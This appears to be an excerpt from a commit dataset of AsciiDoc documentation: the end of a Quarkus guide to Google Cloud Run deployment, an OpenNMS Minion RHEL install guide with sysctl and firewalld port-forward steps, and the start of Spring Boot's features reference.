which files should be not be uploaded for Cloud Build,\nwithout it, it defaults to `.gitignore` that usually exclude the target directory where you packaged application has been created.\n\nIn this example, I only exclude the `src` directory:\n\n[source]\n----\nsrc\/\n----\n\nThen, use Cloud Build to build your image, it will upload to a Google Cloud Storage bucket all the files of your application (except the ones ignored by the `.gcloudignore`file),\nbuild your Docker image and push it to Google Container Registry (GCR).\n\n[source, shell script]\n----\ngcloud builds submit --tag gcr.io\/PROJECT-ID\/helloworld\n----\n\nNOTE: You can also build your image locally and push it to a publicly accessible Docker registry, then use this image in the next step.\n\nFinally, use Cloud Run to launch your application.\n\n[source, shell script]\n----\ngcloud run deploy --image gcr.io\/PROJECT-ID\/helloworld --platform managed\n----\n\nCloud run will ask you questions on the service name, the region and whether or not unauthenticated calls are allowed.\nAfter you answer to these questions, it will deploy your application.\n\nWhen the deployment is done, the output will display the URL to access your application.\n\n== Going further\n\nYou can find a set of extensions to access various Google Cloud Services in the Quarkiverse (a GitHub organization for Quarkus extensions maintained by the community),\nincluding PubSub, BigQuery, Storage, Spanner, Firestore (visit the repository for an accurate list of supported services).\n\nYou can find some documentation about them in the link:https:\/\/github.com\/quarkiverse\/quarkiverse-google-cloud-services[Quarkiverse Google Cloud Services repository].\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bead66e0edb86ae4cc7d3c12a7f49f4fc9e4a5dc","subject":"HZN-621 add documentation on port forwards and ICMP sysctl","message":"HZN-621 add documentation on port forwards and ICMP sysctl\n","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/minion\/rhel.adoc","new_file":"opennms-doc\/guide-install\/src\/asciidoc\/text\/minion\/rhel.adoc","new_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-install-minion-rhel]]\n=== RHEL\n\nNOTE: This description was built on _RHEL 7_ and _CentOS 7.1_.\n\n==== Install Minion\n\nStart by <<gi-install-opennms-yum-repo,setting up the OpenNMS Yum repository>> and <<gi-install-oracle-java,installing Java>>.\n\nNOTE: OpenNMS Minion currently requires a JDK. 
See http:\/\/issues.opennms.org\/browse\/HZN-620[HZN-620] for details.\n\nOnce the _Yum_ repository has been configured:\n\n.Install the _Minion_ packages\n[source, bash]\n----\nyum -y install opennms-minion\n----\n\nThe following packages will be automatically installed:\n\n* _opennms-minion_: The Minion meta package\n* _opennms-minion-container_: The _Karaf_ OSGi container with _Minion_ branding and additional management extensions\n* _opennms-minion-features-core_: Core utilities and services required by the _Minion_ features\n* _opennms-minion-features-default_: Service-specific features\n\nThe _Minion_ packages set up the following directory structure:\n\n[source, shell]\n----\n[root@localhost \/opt\/minion]# $ tree -L 1\n.\n\u251c\u2500\u2500 bin\n\u251c\u2500\u2500 deploy\n\u251c\u2500\u2500 etc\n\u251c\u2500\u2500 lib\n\u251c\u2500\u2500 repositories\n\u2514\u2500\u2500 system\n----\n\n[[gi-install-minion-rhel-ping]]\n==== Configure Linux to Allow Non-Root ICMP\n\nBy default, Linux does not allow regular users to perform `ping` operations from arbitrary programs (including Java). To enable the Minion to ping properly, you must set a sysctl option.\n\n.Enable User Ping (Running System)\n[source, shell]\n----\n# run this command as root to allow ping by any user (does not survive reboots)\nsysctl net.ipv4.ping_group_range='0 429496729'\n----\n\nIf you wish to restrict the range further, use the GID for the user the Minion will run as, rather than `429496729`.\n\nTo enable this permanently, create a file in `\/etc\/sysctl.d\/` to set the range:\n\n.\/etc\/sysctl.d\/99-zzz-non-root-icmp.conf\n[source, shell]\n----\n# we start this filename with \"99-zzz-\" to make sure it's last, after anything else that might have set it\nnet.ipv4.ping_group_range=0 429496729\n----\n\n[[gi-install-minion-rhel-trapd]]\n==== Configure Minion to Receive Traps\n\nIf you wish your Minion to listen to SNMP traps, you will need to configure your firewall to port-forward from the privileged trap port (162) to the Minion's default trap listener on port 1162.\n\n.Forward 162 to 1162 with Firewalld\n[source, shell]\n----\n# enable masquerade to allow port-forwards\nfirewall-cmd --add-masquerade\n# forward port 162 TCP and UDP to port 1162 on localhost\nfirewall-cmd --add-forward-port=port=162:proto=udp:toport=1162:toaddr=127.0.0.1\nfirewall-cmd --add-forward-port=port=162:proto=tcp:toport=1162:toaddr=127.0.0.1\n----\n\n[[gi-install-minion-rhel-syslogd]]\n==== Configure Minion to Receive Syslog Messages\n\nIf you wish your Minion to listen to syslog messages, you will need to configure your firewall to port-forward from the privileged syslog port (514) to the Minion's default syslog listener on port 1514.\n\n.Forward 514 to 1514 with Firewalld\n[source, shell]\n----\n# enable masquerade to allow port-forwards\nfirewall-cmd --add-masquerade\n# forward port 514 TCP and UDP to port 1514 on localhost\nfirewall-cmd --add-forward-port=port=514:proto=udp:toport=1514:toaddr=127.0.0.1\nfirewall-cmd --add-forward-port=port=514:proto=tcp:toport=1514:toaddr=127.0.0.1\n----\n\n[[gi-install-minion-rhel-init]]\n==== Initialize Minion\n\n.System startup configuration for _Minion_\n[source, shell]\n----\nsystemctl enable minion\n----\n\n.Startup _Minion_\n[source, shell]\n----\nsystemctl start minion\n----\n\nAfter starting _Minion_ the shell can be accessed locally on ssh:\/\/localhost:8201.\nThe default login user is _admin_ and the password is initialized to _admin_.\n\n[source, shell]\n----\n[root@localhost \/root]# $ ssh -p 
8201 admin@localhost\n----\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/images\n\n[[gi-install-minion-rhel]]\n=== RHEL\n\nNOTE: This description was built on _RHEL 7_ and _CentOS 7.1_.\n\n==== Install Minion\n\nStart by <<gi-install-opennms-yum-repo,setting up the OpenNMS Yum repository>> and <<gi-install-oracle-java,installing Java>>.\n\nNOTE: OpenNMS Minion currently requires a JDK. See http:\/\/issues.opennms.org\/browse\/HZN-620[HZN-620] for details.\n\nOnce the _Yum_ repository has been configured:\n\n.Install the _Minion_ packages\n[source, bash]\n----\nyum -y install opennms-minion\n----\n\nThe following packages will be automatically installed:\n\n* _opennms-minion_: The Minion meta package\n* _opennms-minion-container_: The _Karaf_ OSGi container with _Minion_ branding and additional management extensions\n* _opennms-minion-features-core_: Core utilities and services required by the _Minion_ features\n* _opennms-minion-features-default_: Service-specific features\n\nThe _Minion_ packages setup the following directory structure:\n\n[source, shell]\n----\n[root@localhost \/opt\/minion]# $ tree -L 1\n.\n\u251c\u2500\u2500 bin\n\u251c\u2500\u2500 deploy\n\u251c\u2500\u2500 etc\n\u251c\u2500\u2500 lib\n\u251c\u2500\u2500 repositories\n\u2514\u2500\u2500 system\n----\n\n[[gi-install-minion-rhel-init]]\n==== Initialize Minion\n\n.System startup configuration for _Minion_\n[source, shell]\n----\nsystemctl enable minion\n----\n\n.Startup _Minion_\n[source, shell]\n----\nsystemctl start minion\n----\n\nAfter starting _Minion_ the shell can be accessed locally on ssh:\/\/localhost:8201.\nThe default login user is _admin_ and the password is initialized to _admin_.\n\n[source, shell]\n----\n[root@localhost \/root]# $ ssh -p 8201 admin@localhost\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"187b4e706c778ec2e5f3fe4e2f61cb3d461efef4","subject":"Escape `...*...` outputs using `+...*...+`","message":"Escape `...*...` outputs using 
`+...*...+`\n","repos":"joansmith\/spring-boot,xiaoleiPENG\/my-project,lburgazzoli\/spring-boot,dfa1\/spring-boot,mbogoevici\/spring-boot,lexandro\/spring-boot,jjankar\/spring-boot,ralenmandao\/spring-boot,liupd\/spring-boot,i007422\/jenkins2-course-spring-boot,M3lkior\/spring-boot,imranansari\/spring-boot,cbtpro\/spring-boot,qq83387856\/spring-boot,pvorb\/spring-boot,duandf35\/spring-boot,yunbian\/spring-boot,shakuzen\/spring-boot,nandakishorm\/spring-boot,10045125\/spring-boot,DONIKAN\/spring-boot,linead\/spring-boot,roymanish\/spring-boot,yuxiaole\/spring-boot,drunklite\/spring-boot,yhj630520\/spring-boot,mosoft521\/spring-boot,donthadineshkumar\/spring-boot,tsachev\/spring-boot,bbrouwer\/spring-boot,Nowheresly\/spring-boot,krmcbride\/spring-boot,prakashme\/spring-boot,hqrt\/jenkins2-course-spring-boot,hqrt\/jenkins2-course-spring-boot,qerub\/spring-boot,habuma\/spring-boot,raiamber1\/spring-boot,RichardCSantana\/spring-boot,smilence1986\/spring-boot,NetoDevel\/spring-boot,Buzzardo\/spring-boot,jrrickard\/spring-boot,ChunPIG\/spring-boot,RishikeshDarandale\/spring-boot,nevenc-pivotal\/spring-boot,christian-posta\/spring-boot,AstaTus\/spring-boot,ihoneymon\/spring-boot,PraveenkumarShethe\/spring-boot,crackien\/spring-boot,nghialunhaiha\/spring-boot,hehuabing\/spring-boot,frost2014\/spring-boot,Chomeh\/spring-boot,mebinjacob\/spring-boot,cmsandiga\/spring-boot,shakuzen\/spring-boot,Nowheresly\/spring-boot,donhuvy\/spring-boot,scottfrederick\/spring-boot,tan9\/spring-boot,keithsjohnson\/spring-boot,vpavic\/spring-boot,mbogoevici\/spring-boot,Xaerxess\/spring-boot,sungha\/spring-boot,wilkinsona\/spring-boot,patrikbeno\/spring-boot,MrMitchellMoore\/spring-boot,marcellodesales\/spring-boot,yhj630520\/spring-boot,nevenc-pivotal\/spring-boot,krmcbride\/spring-boot,jrrickard\/spring-boot,drunklite\/spring-boot,michael-simons\/spring-boot,mouadtk\/spring-boot,ApiSecRay\/spring-boot,jorgepgjr\/spring-boot,akmaharshi\/jenkins,paweldolecinski\/spring-boot,jcastaldoFoodEssentials\/spring-boot,linead\/spring-boot,Pokbab\/spring-boot,javyzheng\/spring-boot,lcardito\/spring-boot,jmnarloch\/spring-boot,xwjxwj30abc\/spring-boot,pvorb\/spring-boot,mouadtk\/spring-boot,joshthornhill\/spring-boot,PraveenkumarShethe\/spring-boot,axibase\/spring-boot,existmaster\/spring-boot,fireshort\/spring-boot,lokbun\/spring-boot,RainPlanter\/spring-boot,jvz\/spring-boot,marcellodesales\/spring-boot,trecloux\/spring-boot,SPNilsen\/spring-boot,prasenjit-net\/spring-boot,xc145214\/spring-boot,DONIKAN\/spring-boot,zhangshuangquan\/spring-root,roymanish\/spring-boot,ralenmandao\/spring-boot,jorgepgjr\/spring-boot,prakashme\/spring-boot,allyjunio\/spring-boot,RainPlanter\/spring-boot,ihoneymon\/spring-boot,frost2014\/spring-boot,brettwooldridge\/spring-boot,paweldolecinski\/spring-boot,AngusZhu\/spring-boot,Xaerxess\/spring-boot,srinivasan01\/spring-boot,zhanhb\/spring-boot,lokbun\/spring-boot,royclarkson\/spring-boot,lexandro\/spring-boot,habuma\/spring-boot,RobertNickens\/spring-boot,akmaharshi\/jenkins,meloncocoo\/spring-boot,qq83387856\/spring-boot,lingounet\/spring-boot,crackien\/spring-boot,JiweiWong\/spring-boot,joshthornhill\/spring-boot,coolcao\/spring-boot,izeye\/spring-boot,herau\/spring-boot,izestrea\/spring-boot,aahlenst\/spring-boot,i007422\/jenkins2-course-spring-boot,VitDevelop\/spring-boot,MrMitchellMoore\/spring-boot,mabernardo\/spring-boot,nurkiewicz\/spring-boot,artembilan\/spring-boot,prasenjit-net\/spring-boot,liupd\/spring-boot,huangyugui\/spring-boot,AngusZhu\/spring-boot,patrikbeno\/spring-boot,ChunPIG\/
spring-boot,huangyugui\/spring-boot,kamilszymanski\/spring-boot,kayelau\/spring-boot,coolcao\/spring-boot,fjlopez\/spring-boot,lburgazzoli\/spring-boot,kiranbpatil\/spring-boot,ractive\/spring-boot,jeremiahmarks\/spring-boot,auvik\/spring-boot,ApiSecRay\/spring-boot,sankin\/spring-boot,5zzang\/spring-boot,hehuabing\/spring-boot,ameraljovic\/spring-boot,mosen11\/spring-boot,ilayaperumalg\/spring-boot,trecloux\/spring-boot,trecloux\/spring-boot,balajinsr\/spring-boot,na-na\/spring-boot,clarklj001\/spring-boot,dfa1\/spring-boot,cleverjava\/jenkins2-course-spring-boot,xialeizhou\/spring-boot,ChunPIG\/spring-boot,duandf35\/spring-boot,mebinjacob\/spring-boot,lexandro\/spring-boot,brettwooldridge\/spring-boot,drumonii\/spring-boot,nelswadycki\/spring-boot,lokbun\/spring-boot,donhuvy\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,mackeprm\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ameraljovic\/spring-boot,ptahchiev\/spring-boot,i007422\/jenkins2-course-spring-boot,pvorb\/spring-boot,RainPlanter\/spring-boot,npcode\/spring-boot,tsachev\/spring-boot,tsachev\/spring-boot,snicoll\/spring-boot,zhanhb\/spring-boot,artembilan\/spring-boot,meftaul\/spring-boot,mbenson\/spring-boot,jrrickard\/spring-boot,aahlenst\/spring-boot,mosen11\/spring-boot,christian-posta\/spring-boot,navarrogabriela\/spring-boot,damoyang\/spring-boot,peteyan\/spring-boot,ApiSecRay\/spring-boot,olivergierke\/spring-boot,designreuse\/spring-boot,jayarampradhan\/spring-boot,tbadie\/spring-boot,nelswadycki\/spring-boot,fulvio-m\/spring-boot,felipeg48\/spring-boot,end-user\/spring-boot,candrews\/spring-boot,srinivasan01\/spring-boot,yangdd1205\/spring-boot,vpavic\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,pvorb\/spring-boot,eric-stanley\/spring-boot,coolcao\/spring-boot,Chomeh\/spring-boot,sebastiankirsch\/spring-boot,mike-kukla\/spring-boot,ractive\/spring-boot,herau\/spring-boot,vandan16\/Vandan,tbadie\/spring-boot,nelswadycki\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,rams2588\/spring-boot,minmay\/spring-boot,prakashme\/spring-boot,nebhale\/spring-boot,domix\/spring-boot,buobao\/spring-boot,qerub\/spring-boot,simonnordberg\/spring-boot,mosen11\/spring-boot,bjornlindstrom\/spring-boot,jjankar\/spring-boot,satheeshmb\/spring-boot,joansmith\/spring-boot,RishikeshDarandale\/spring-boot,rickeysu\/spring-boot,166yuan\/spring-boot,zorosteven\/spring-boot,balajinsr\/spring-boot,chrylis\/spring-boot,bbrouwer\/spring-boot,tbadie\/spring-boot,kdvolder\/spring-boot,PraveenkumarShethe\/spring-boot,sungha\/spring-boot,JiweiWong\/spring-boot,lif123\/spring-boot,RichardCSantana\/spring-boot,jayarampradhan\/spring-boot,liupugong\/spring-boot,NetoDevel\/spring-boot,bijukunjummen\/spring-boot,gorcz\/spring-boot,liupugong\/spring-boot,jeremiahmarks\/spring-boot,sankin\/spring-boot,rmoorman\/spring-boot,htynkn\/spring-boot,nurkiewicz\/spring-boot,bclozel\/spring-boot,end-user\/spring-boot,eric-stanley\/spring-boot,jeremiahmarks\/spring-boot,kayelau\/spring-boot,xwjxwj30abc\/spring-boot,olivergierke\/spring-boot,mbrukman\/spring-boot,okba1\/spring-boot,DeezCashews\/spring-boot,npcode\/spring-boot,jjankar\/spring-boot,clarklj001\/spring-boot,xc145214\/spring-boot,axelfontaine\/spring-boot,rizwan18\/spring-boot,akmaharshi\/jenkins,kdvolder\/spring-boot,axelfontaine\/spring-boot,okba1\/spring-boot,wilkinsona\/spring-boot,philwebb\/spring-boot,kdvolder\/spring-boot,166yuan\/spring-boot,panbiping\/spring-boot,shakuzen\/spring-boot,sbuettner\/spring-boot,rweisleder\/spring-boot,philwebb\/spring-boot,jbovet\/spring-boot
,mbrukman\/spring-boot,lexandro\/spring-boot,rams2588\/spring-boot,xdweleven\/spring-boot,satheeshmb\/spring-boot,krmcbride\/spring-boot,meloncocoo\/spring-boot,eliudiaz\/spring-boot,lburgazzoli\/spring-boot,166yuan\/spring-boot,dnsw83\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,axibase\/spring-boot,kayelau\/spring-boot,166yuan\/spring-boot,kiranbpatil\/spring-boot,neo4j-contrib\/spring-boot,sbcoba\/spring-boot,peteyan\/spring-boot,npcode\/spring-boot,lif123\/spring-boot,eric-stanley\/spring-boot,cmsandiga\/spring-boot,eddumelendez\/spring-boot,MasterRoots\/spring-boot,M3lkior\/spring-boot,sungha\/spring-boot,jxblum\/spring-boot,Xaerxess\/spring-boot,mike-kukla\/spring-boot,izeye\/spring-boot,lburgazzoli\/spring-boot,xialeizhou\/spring-boot,mosen11\/spring-boot,joshthornhill\/spring-boot,RainPlanter\/spring-boot,lucassaldanha\/spring-boot,cbtpro\/spring-boot,master-slave\/spring-boot,existmaster\/spring-boot,afroje-reshma\/spring-boot-sample,nevenc-pivotal\/spring-boot,roymanish\/spring-boot,candrews\/spring-boot,lenicliu\/spring-boot,ihoneymon\/spring-boot,cmsandiga\/spring-boot,spring-projects\/spring-boot,thomasdarimont\/spring-boot,keithsjohnson\/spring-boot,habuma\/spring-boot,Charkui\/spring-boot,buobao\/spring-boot,rams2588\/spring-boot,vandan16\/Vandan,deki\/spring-boot,end-user\/spring-boot,gauravbrills\/spring-boot,eddumelendez\/spring-boot,allyjunio\/spring-boot,lif123\/spring-boot,mbogoevici\/spring-boot,donthadineshkumar\/spring-boot,hello2009chen\/spring-boot,xingguang2013\/spring-boot,mosoft521\/spring-boot,nebhale\/spring-boot,spring-projects\/spring-boot,orangesdk\/spring-boot,coolcao\/spring-boot,prasenjit-net\/spring-boot,linead\/spring-boot,lingounet\/spring-boot,SaravananParthasarathy\/SPSDemo,ractive\/spring-boot,auvik\/spring-boot,ihoneymon\/spring-boot,sebastiankirsch\/spring-boot,jxblum\/spring-boot,liupd\/spring-boot,nghiavo\/spring-boot,rstirling\/spring-boot,paddymahoney\/spring-boot,qerub\/spring-boot,jayarampradhan\/spring-boot,DONIKAN\/spring-boot,afroje-reshma\/spring-boot-sample,xc145214\/spring-boot,izestrea\/spring-boot,eonezhang\/spring-boot,rstirling\/spring-boot,patrikbeno\/spring-boot,bsodzik\/spring-boot,yunbian\/spring-boot,jack-luj\/spring-boot,axibase\/spring-boot,jmnarloch\/spring-boot,zorosteven\/spring-boot,damoyang\/spring-boot,pnambiarsf\/spring-boot,wwadge\/spring-boot,roymanish\/spring-boot,mbogoevici\/spring-boot,mbrukman\/spring-boot,hehuabing\/spring-boot,donhuvy\/spring-boot,meftaul\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jmnarloch\/spring-boot,xdweleven\/spring-boot,nandakishorm\/spring-boot,vaseemahmed01\/spring-boot,vandan16\/Vandan,nelswadycki\/spring-boot,ilayaperumalg\/spring-boot,minmay\/spring-boot,philwebb\/spring-boot-concourse,mlc0202\/spring-boot,pnambiarsf\/spring-boot,lingounet\/spring-boot,bclozel\/spring-boot,nghialunhaiha\/spring-boot,donhuvy\/spring-boot,srinivasan01\/spring-boot,huangyugui\/spring-boot,peteyan\/spring-boot,jayeshmuralidharan\/spring-boot,ApiSecRay\/spring-boot,bijukunjummen\/spring-boot,nghialunhaiha\/spring-boot,AstaTus\/spring-boot,auvik\/spring-boot,olivergierke\/spring-boot,philwebb\/spring-boot,mbrukman\/spring-boot,wilkinsona\/spring-boot,joshiste\/spring-boot,dreis2211\/spring-boot,Pokbab\/spring-boot,qq83387856\/spring-boot,ralenmandao\/spring-boot,murilobr\/spring-boot,vaseemahmed01\/spring-boot,drunklite\/spring-boot,yuxiaole\/spring-boot,buobao\/spring-boot,shangyi0102\/spring-boot,vakninr\/spring-boot,ollie314\/spring-boot,nghiavo\/spring-boot,scottfrederick\/s
pring-boot,sungha\/spring-boot,krmcbride\/spring-boot,qerub\/spring-boot,MasterRoots\/spring-boot,damoyang\/spring-boot,10045125\/spring-boot,lucassaldanha\/spring-boot,okba1\/spring-boot,nareshmiriyala\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,zorosteven\/spring-boot,roberthafner\/spring-boot,hklv\/spring-boot,VitDevelop\/spring-boot,simonnordberg\/spring-boot,axelfontaine\/spring-boot,isopov\/spring-boot,xialeizhou\/spring-boot,jforge\/spring-boot,clarklj001\/spring-boot,smilence1986\/spring-boot,mike-kukla\/spring-boot,shangyi0102\/spring-boot,thomasdarimont\/spring-boot,jack-luj\/spring-boot,balajinsr\/spring-boot,brettwooldridge\/spring-boot,mohican0607\/spring-boot,satheeshmb\/spring-boot,xingguang2013\/spring-boot,Makhlab\/spring-boot,forestqqqq\/spring-boot,dreis2211\/spring-boot,tbadie\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,mdeinum\/spring-boot,jayeshmuralidharan\/spring-boot,paweldolecinski\/spring-boot,lcardito\/spring-boot,balajinsr\/spring-boot,wilkinsona\/spring-boot,RichardCSantana\/spring-boot,playleud\/spring-boot,olivergierke\/spring-boot,dnsw83\/spring-boot,joshiste\/spring-boot,satheeshmb\/spring-boot,dnsw83\/spring-boot,kamilszymanski\/spring-boot,murilobr\/spring-boot,herau\/spring-boot,designreuse\/spring-boot,auvik\/spring-boot,gorcz\/spring-boot,allyjunio\/spring-boot,AngusZhu\/spring-boot,nebhale\/spring-boot,herau\/spring-boot,rizwan18\/spring-boot,thomasdarimont\/spring-boot,jvz\/spring-boot,felipeg48\/spring-boot,navarrogabriela\/spring-boot,AstaTus\/spring-boot,lucassaldanha\/spring-boot,eonezhang\/spring-boot,cleverjava\/jenkins2-course-spring-boot,smilence1986\/spring-boot,nareshmiriyala\/spring-boot,mbenson\/spring-boot,mdeinum\/spring-boot,srikalyan\/spring-boot,christian-posta\/spring-boot,srikalyan\/spring-boot,Nowheresly\/spring-boot,marcellodesales\/spring-boot,yuxiaole\/spring-boot,lburgazzoli\/spring-boot,imranansari\/spring-boot,javyzheng\/spring-boot,eddumelendez\/spring-boot,bclozel\/spring-boot,durai145\/spring-boot,jforge\/spring-boot,duandf35\/spring-boot,tbbost\/spring-boot,jayeshmuralidharan\/spring-boot,drumonii\/spring-boot,duandf35\/spring-boot,aahlenst\/spring-boot,navarrogabriela\/spring-boot,joshthornhill\/spring-boot,minmay\/spring-boot,MasterRoots\/spring-boot,raiamber1\/spring-boot,yhj630520\/spring-boot,srinivasan01\/spring-boot,tan9\/spring-boot,hklv\/spring-boot,nurkiewicz\/spring-boot,zhangshuangquan\/spring-root,linead\/spring-boot,durai145\/spring-boot,ihoneymon\/spring-boot,snicoll\/spring-boot,DeezCashews\/spring-boot,na-na\/spring-boot,meloncocoo\/spring-boot,jforge\/spring-boot,trecloux\/spring-boot,jack-luj\/spring-boot,jbovet\/spring-boot,izestrea\/spring-boot,nghiavo\/spring-boot,rickeysu\/spring-boot,bijukunjummen\/spring-boot,ptahchiev\/spring-boot,cleverjava\/jenkins2-course-spring-boot,mohican0607\/spring-boot,isopov\/spring-boot,orangesdk\/spring-boot,mrumpf\/spring-boot,frost2014\/spring-boot,kiranbpatil\/spring-boot,johnktims\/spring-boot,joshiste\/spring-boot,AngusZhu\/spring-boot,rmoorman\/spring-boot,marcellodesales\/spring-boot,nisuhw\/spring-boot,nevenc-pivotal\/spring-boot,RichardCSantana\/spring-boot,cleverjava\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,Buzzardo\/spring-boot,ptahchiev\/spring-boot,soul2zimate\/spring-boot,isopov\/spring-boot,fireshort\/spring-boot,mike-kukla\/spring-boot,xdweleven\/spring-boot,scottfrederick\/spring-boot,Chomeh\/spring-boot,jmnarloch\/spring-boot,mbnshankar\/spring-boot,Charkui\/spring-boot,joshiste\/spring-
boot,eliudiaz\/spring-boot,keithsjohnson\/spring-boot,xiaoleiPENG\/my-project,gorcz\/spring-boot,izeye\/spring-boot,i007422\/jenkins2-course-spring-boot,vakninr\/spring-boot,smayoorans\/spring-boot,gauravbrills\/spring-boot,neo4j-contrib\/spring-boot,tsachev\/spring-boot,MrMitchellMoore\/spring-boot,aahlenst\/spring-boot,nareshmiriyala\/spring-boot,peteyan\/spring-boot,joshiste\/spring-boot,nelswadycki\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,neo4j-contrib\/spring-boot,playleud\/spring-boot,bbrouwer\/spring-boot,i007422\/jenkins2-course-spring-boot,izeye\/spring-boot,eliudiaz\/spring-boot,mabernardo\/spring-boot,simonnordberg\/spring-boot,SaravananParthasarathy\/SPSDemo,mrumpf\/spring-boot,vaseemahmed01\/spring-boot,Buzzardo\/spring-boot,spring-projects\/spring-boot,ilayaperumalg\/spring-boot,PraveenkumarShethe\/spring-boot,artembilan\/spring-boot,lcardito\/spring-boot,drumonii\/spring-boot,akmaharshi\/jenkins,crackien\/spring-boot,cbtpro\/spring-boot,soul2zimate\/spring-boot,clarklj001\/spring-boot,candrews\/spring-boot,vpavic\/spring-boot,buobao\/spring-boot,prasenjit-net\/spring-boot,M3lkior\/spring-boot,dnsw83\/spring-boot,Pokbab\/spring-boot,royclarkson\/spring-boot,mbnshankar\/spring-boot,shakuzen\/spring-boot,RichardCSantana\/spring-boot,xc145214\/spring-boot,philwebb\/spring-boot,sbcoba\/spring-boot,vakninr\/spring-boot,mosoft521\/spring-boot,kayelau\/spring-boot,ractive\/spring-boot,fogone\/spring-boot,drumonii\/spring-boot,yuxiaole\/spring-boot,playleud\/spring-boot,axelfontaine\/spring-boot,jack-luj\/spring-boot,rams2588\/spring-boot,dfa1\/spring-boot,playleud\/spring-boot,xingguang2013\/spring-boot,rickeysu\/spring-boot,lif123\/spring-boot,designreuse\/spring-boot,gauravbrills\/spring-boot,tbbost\/spring-boot,tiarebalbi\/spring-boot,SPNilsen\/spring-boot,donhuvy\/spring-boot,murilobr\/spring-boot,cmsandiga\/spring-boot,scottfrederick\/spring-boot,smilence1986\/spring-boot,mbnshankar\/spring-boot,tiarebalbi\/spring-boot,meloncocoo\/spring-boot,izestrea\/spring-boot,htynkn\/spring-boot,sbuettner\/spring-boot,ydsakyclguozi\/spring-boot,gregturn\/spring-boot,wwadge\/spring-boot,johnktims\/spring-boot,ojacquemart\/spring-boot,SaravananParthasarathy\/SPSDemo,orangesdk\/spring-boot,yuxiaole\/spring-boot,master-slave\/spring-boot,5zzang\/spring-boot,tbbost\/spring-boot,okba1\/spring-boot,cbtpro\/spring-boot,mike-kukla\/spring-boot,dreis2211\/spring-boot,hklv\/spring-boot,tsachev\/spring-boot,durai145\/spring-boot,166yuan\/spring-boot,JiweiWong\/spring-boot,panbiping\/spring-boot,hqrt\/jenkins2-course-spring-boot,NetoDevel\/spring-boot,christian-posta\/spring-boot,xialeizhou\/spring-boot,marcellodesales\/spring-boot,xdweleven\/spring-boot,frost2014\/spring-boot,mbnshankar\/spring-boot,thomasdarimont\/spring-boot,kiranbpatil\/spring-boot,wwadge\/spring-boot,tiarebalbi\/spring-boot,lucassaldanha\/spring-boot,RainPlanter\/spring-boot,AngusZhu\/spring-boot,neo4j-contrib\/spring-boot,mosen11\/spring-boot,zhanhb\/spring-boot,kiranbpatil\/spring-boot,gauravbrills\/spring-boot,meloncocoo\/spring-boot,spring-projects\/spring-boot,eddumelendez\/spring-boot,5zzang\/spring-boot,jvz\/spring-boot,DONIKAN\/spring-boot,murilobr\/spring-boot,drumonii\/spring-boot,rmoorman\/spring-boot,bclozel\/spring-boot,xwjxwj30abc\/spring-boot,ojacquemart\/spring-boot,michael-simons\/spring-boot,fireshort\/spring-boot,mebinjacob\/spring-boot,tbbost\/spring-boot,ilayaperumalg\/spring-boot,dnsw83\/spring-boot,orangesdk\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,rweisleder\/spring-boot,jvz
[[boot-features]]
= Spring Boot features

[partintro]
--
This section dives into the details of Spring Boot. Here you can learn about the key
features that you will want to use and customize. If you haven't already, you might want
to read the '<<getting-started.adoc#getting-started>>' and
'<<using-spring-boot.adoc#using-boot>>' sections so that you have a good grounding
of the basics.
--



[[boot-features-spring-application]]
== SpringApplication
The `SpringApplication` class provides a convenient way to bootstrap a Spring application
that will be started from a `main()` method. In many situations you can just delegate to
the static `SpringApplication.run` method:

[source,java,indent=0]
----
	public static void main(String[] args) {
		SpringApplication.run(MySpringConfiguration.class, args);
	}
----

When your application starts you should see something similar to the following:

[indent=0,subs="attributes"]
----
  .   ____          _            __ _ _
 /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
 \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
  '  |____| .__|_| |_|_| |_\__, | / / / /
 =========|_|==============|___/=/_/_/_/
 :: Spring Boot ::  v{spring-boot-version}

2013-07-31 00:08:16.117  INFO 56603 --- [           main] o.s.b.s.app.SampleApplication            : Starting SampleApplication v0.1.0 on mycomputer with PID 56603 (/apps/myapp.jar started by pwebb)
2013-07-31 00:08:16.166  INFO 56603 --- [           main] ationConfigEmbeddedWebApplicationContext : Refreshing org.springframework.boot.context.embedded.AnnotationConfigEmbeddedWebApplicationContext@6e5a8246: startup date [Wed Jul 31 00:08:16 PDT 2013]; root of context hierarchy
2014-03-04 13:09:54.912  INFO 41370 --- [           main] .t.TomcatEmbeddedServletContainerFactory : Server initialized with port: 8080
2014-03-04 13:09:56.501  INFO 41370 --- [           main] o.s.b.s.app.SampleApplication            : Started SampleApplication in 2.992 seconds (JVM running for 3.658)
----

By default `INFO` logging messages will be shown, including some relevant startup details
such as the user that launched the application.



[[boot-features-banner]]
=== Customizing the Banner
The banner that is printed on start up can be changed by adding a `banner.txt` file
to your classpath, or by setting `banner.location` to the location of such a file.
If the file has an unusual encoding you can set `banner.encoding` (the default is UTF-8).



[[boot-features-customizing-spring-application]]
=== Customizing SpringApplication
If the `SpringApplication` defaults aren't to your taste you can instead create a local
instance and customize it. For example, to turn off the banner you would write:

[source,java,indent=0]
----
	public static void main(String[] args) {
		SpringApplication app = new SpringApplication(MySpringConfiguration.class);
		app.setShowBanner(false);
		app.run(args);
	}
----

NOTE: The constructor arguments passed to `SpringApplication` are configuration sources
for Spring beans. In most cases these will be references to `@Configuration` classes, but
